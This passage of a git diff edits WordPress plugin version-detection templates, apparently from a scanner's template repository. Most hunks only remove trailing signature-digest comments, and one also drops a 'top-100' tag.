a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b6531158ef814ec02823b746ac2c492b806b3535a37933adba7a65abcc4294f022100fb433a518824fb472fa1af7a163272024eb935ff9d0ed76654a7fd70803c5f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index baf0241f1d..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba2e556d60e0e249b8cd5889fe089dc9bc0d7726325339586b3368698b909254022100dd8040ea1afe2ef493dec4c78b3f666386625e8b317269b20b971a814475259d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index b0abf0b9fa..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204e5ead95348c8a3df47c0a8b1e469b5e594cb3317efe10317f5b629ab3e1e5f4022056f13090e3c23931ba2e67ba29cc4e24ddaa9801c8533378ae2a2821229678dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index af1af7e036..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f06fac8aca28f8c3a66942c2e84645169f967f7edf28f0fb23ca5391242e615022100faed98cae68059e8d76d36f62f56e2f67c3e30b954a836c9447d5401b4f15983:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 5eff65f59e..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009011f70f8a20fa54ce0898a9d6228fa9effb0b0d49225f11c507cee284e8ee9e022100bf232ef3be87eaa95ca9f2c54e8fab115cc6c895f320f5960c7252046639c874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 89a0347480..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206279e8da43ae9e2c5806d56ea609198894398eed5561f7bf50709ddc810cd7be02200e9244ac67737bbc1b955ad81164e71b797a9b91c812ba32f148b3050d06bbec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 9d68ff0bda..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa08f4fac0c55eec455392b3a9966a546dba761bc5fcf609a8d976441de4089302210088c49e4eeaf6942619382819c6fe625627b3afba23f1661d5b95774c3a177cdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index acaf6f1198..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f811f1670bddf38287657735a5e5d624b1fe0ec6d887901bf0ddb517a3a3d36602206694ed11dcfe6689fdb6635aad010b6416ad370cce003548cdeac74b77da1f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index a1480b1a16..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009eec70acd0041e1ed5bbee7ddbd5bc06bd8551f82d2774f16e64e9e2cfbc522b022100b86e39d8d95874c203dca0e93654c694a06d96d0d16d6074d4732c4edbce5beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 400fc62e4f..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005cd1d69c8d4a826fb6ba709be25326c8bd8345fc1080f2244cd30b618c0d05702207bbf6d9c65d70c105f705b611f93b4bf6deeb50d0e138b6fa4a9bc47b0869095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 0417adc2b1..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe61939fcae363750231858af63da7576f3b4580db19e0e03855d012855f92bb02210080e6557c4beb8f319c9e042db15f6d485af2fc356fbdd032acaad064383d90ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 8d61601d9b..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db98dce1fe49b2ccca9ba0d6cd865cc85d5097755b32b8d2b498a1132c7ae79c022035fe96306325c725e42f6c089270fc12977c66a33413e76d6a6b9b2fbe0fbf7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2f6228c797..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa2b762adb7fa2a34713803ef7dcd6b1a720c3803cbae4150d2e7d267e471435022100c0b6e88cfa026d69ee91642861087b9b7759b05977241c33a5bf84a66c7c8a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 00f0f6be88..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206aaee2c895a8e17073177cdd0b26f310b10a551ed2ee6e132607bc3131e4518f022100d5f5f6d38e69e340a645e91ca562dc71f6c420a76930ed5d763e775e7d5d06d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 75aa3fd835..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200f4b779cc0e8896ba57b97bac055ac55c92b281b590d1e025b8b88ebdc55f44c02201acd12f34f34562850bb53a7164ac59206b64a38e5bc8c3c533409dbccb03b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 38718142e8..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100db10df95e7bc579edbecdd52a7cdcbcb7124059c73a21c541d4c2799c05a773a022100db3c2413e39a29803fdafb7d501f16e89b08da4976e659896fa133dcbdad1ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index b966d24e5c..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ec5d4f5f1b5092ade9ee42ecdbe9e2c9032901da8423499f68b665e386bd73a022100b46efd28295204643627994dca3a3b6d7b5eb81b98ba686360d1fd1a1fa63664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index bd41207254..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068d83114420915c2590062e09870057c7d2be008216c23939acbbd78bd75aed9022100c7357bd5e236d4dde73b8e956063728137936c11a26ea39df8a75ab032f26c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 48c88ecba6..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bbe8fbd4043019718487281cfaa94d8c2b31f4a4366601a2db5bf702080c00d102202c8e39f794111a855e627023ee9ad927e8e2b2c704429519ac4cdf55dd070b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 7966c63f00..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d4f7d7b7b861b7d19b281069ad7e60c892df7bd6ef5f72d0075cfe6e3e8de6002200d1fab093fdcf405fb67bdb25d156abedc17ca58a509ec2743bc0ecba0de5038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 019fc9ba2e..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204ca17db1a8c72f519eb60bd691903c1829c4a6ce067bfb6e34656a264396a6470220613b303f4dc1f732a92bc3e860dc2cbc914447f5d4e6ab450fdd1ae1128dd935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 385dc0e3a3..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022015e18e6e5856594623a30b52f85d4d76ca9e6e3f7309af6cd483609779119d3b0221009d7a404428ebde6ee2639e331a558e3f052f1ee94c0aca65d23fc27bc4c4edd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index b9b2140b64..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee642d118d9fd491b2db9b1f9e1fa96fbb9e2e662f21dd8bf0973a031e2e2787022100b392a43e939428d8ae2f06d7003a4594ffcdee1b5331ecdcc169fc27a67fd203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index af68d8eaab..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f87d17473ddab07d8065d0f06c0ba1323cbade9171873afc2001ddc0fc476f102204ec754e776cb26d452b2d9daa84773c98ed2f540d7ed20e765420cbbd70b8aec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 3ea128f8df..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a549af6f657383377ad42b49b0f950bd27246de00e3d554c8a1a0a9c79d87009022100bc16e85f843368b977bef1a50b5d692acd3ce9b7c17aa2d249098dfb080d916c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 6f88d8ddbd..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b2a59e785cf91cb9916e189bb5e523e78cae49076cb22fa99e3487712374bc7022100c92c732ed70cbc8b5f44c53b139e630afb198f5a4dba17c5cbc8851ef6b3ccd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index c843d8cbef..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d2a5038abc743120eaa65a6366f9f877f2b6af44fac0e5c6d5ceb98ba1f982b0220131f376ea6583cdb0de8c3056f1134de9b0b593e50b90664eb6145213f4aa37b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 131e6e9942..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cd56a92ed431994046cc2d11ed89d2cd9cdf38417fca999f0a567560834bc078022016afde734abe32f1783069456447902c8c4767f7386973f8ed0ab09459b75ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index e8d620283c..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1e7d4198043b882b4e7c577d32da0fb493345806c5d9957fd07695dec8528e60220711ef4db0e2956d081c1f796666da8dca4b71c36e8dc9ba5c92737f778d74a47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index f543cb7397..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035f028556ee6f7b7e529078d9171e8ba6009d6085c13c366f7ab060d88cf076d02200353ede180da3e76b2ee38692aed45a9957cf49d43cfc1107d8b29bd314e6dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 508215183a..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa5d60f80074b43715d9ecd4bae5c15b7308d47e63aca95fa99d5e8a5d913ba9022100968074ade46d553cbea8686fb59fe279ffbac963cb0745a422a4d8c8cd2dc6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 3e2420eb40..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a494b3ef1950a71906f49dd9a0106a8fa58ce0bfa425208f6f4d18fa92ab2fb022046c7ecdb1d4e44fdb3f5425a050ae0d908eb10a7958372c57680f25d01372567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 8a9f78558f..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220439eda617685192c726d78e364bf5f0b819a6028f2a4f0de226d6f5868be9de602202505cab4b037227f25f78e9cc052ababfd330c4ef08dcf673f5596e1e0c37942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index c868a98e6f..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d4d38f23ba4726ee958182452f121d0848e35db42379be4b6691ddf2c412e69022100c6bd5029d4e90ba8772019e4bfb029db5024d45f429102254cd7d513489f1a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index c83e6d4ae3..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025f06203ec030a1bd8a211d8ead2ee7f648472e278cc388c043f32db875808570220520658e6dc78aed50c8f41364e0d999b103220a847d89a6178a93c39501b036b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index abdbf7fdac..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064632ae9fa1d6a3f4b8d064aa40987df7a9653da9db00e7b2a8a2df28ec78cbc02204a05757fedb770b17ebc59c334aeb367f5ce994a5cef013f8d9fbb2a952f4e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f69d0abc60..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100974ddf174156fde780557d53ccaccda779a06e31a98ce430ba7497c75abbc13a022100fd4a66803170897489bc9e2a0d1178ef120157fbad170270be113681d95dae26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index c188d3bb30..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082411521142d9b262f0963d763b64d1310803ce621504b1dd2b1528c69839fda02200ed2385e4a311bb3004cdb7eec21786979083a7beacbaae5422e9b7832e3c016:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index afb4e1dbee..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7580268524d1b1ae3e2f4aa80a08ee36bdd80bef69d4e0c6587832dd5fab68d02210087b24ce18d1979149691e2e86bac0b2a900d8645a84950061d3bed46702c0c95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 4d7025a775..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f9fac27fea657e9b08143b024c41941eea9c52a5b46eb1ad1ab7e09c696c6eed022100bd921145015661af2ea1e9814e35ed49c9d761715b987801a9f487b348636678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 9f52986f6d..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204d5cc207a0bc264fc999ac254e31ace96a550f1844796e796ab79c634907cf62022100e517e8c19510e406a822a1dd023cdde60d4b304f2a5d4f33cacb617031aa6f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index b1cca05f15..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d8c5eafa508acef94947834a57fda8f6aeaa567428d6d3fa68f2407f205e1b002207a445ea16877e147c7b71f49b02a72f2365a9ca3f3014f173fcf5962e33d5919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 3064ff6a7b..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100882c69cec85ed1abdb0621c9d438538ad64b36ca74e2fcbe53e347f2978738de022100a1a5601eb357c2d8e83b261d4ffe0b01e8f5863f5b4ae681bf78dff306b7ed39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 690c414c69..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a43ce3d5ac154c58211e1457343d53b0b6041ee05c86b789a8f7bc27b3cee9a02205444c6798ae466b50f98884a8af30b192e3abd9edf9dbc9d40d0dc723dc4bc40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index d3617ad7bb..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3329e47d57316cf522e73baf53113d8b43c657732e77a7c491ef3b0cdae04cd022100f2fbcb241f678fc6fce16c4cdfbb06650c4bf8c232bbd739e77c434b8b15d533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 482051e716..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220064c7558a15df9a54bf042f9d107dcae544f9238fa7ab70640221a14f612e54f022100a3548cb179e6d131f4cd10ed1725f4ccfe713e59f037f1c33d8b051d67ed9ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 79b8b9945b..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220400426f90016a6bad7788b05fae96aa786ab042b0b1d0740e22ff2873ba1d3c10220734a3ee55eb7f4b165f277482f4e929492d7b1518f32ee8e0915ddd60c47371b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index b52cf21e5e..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 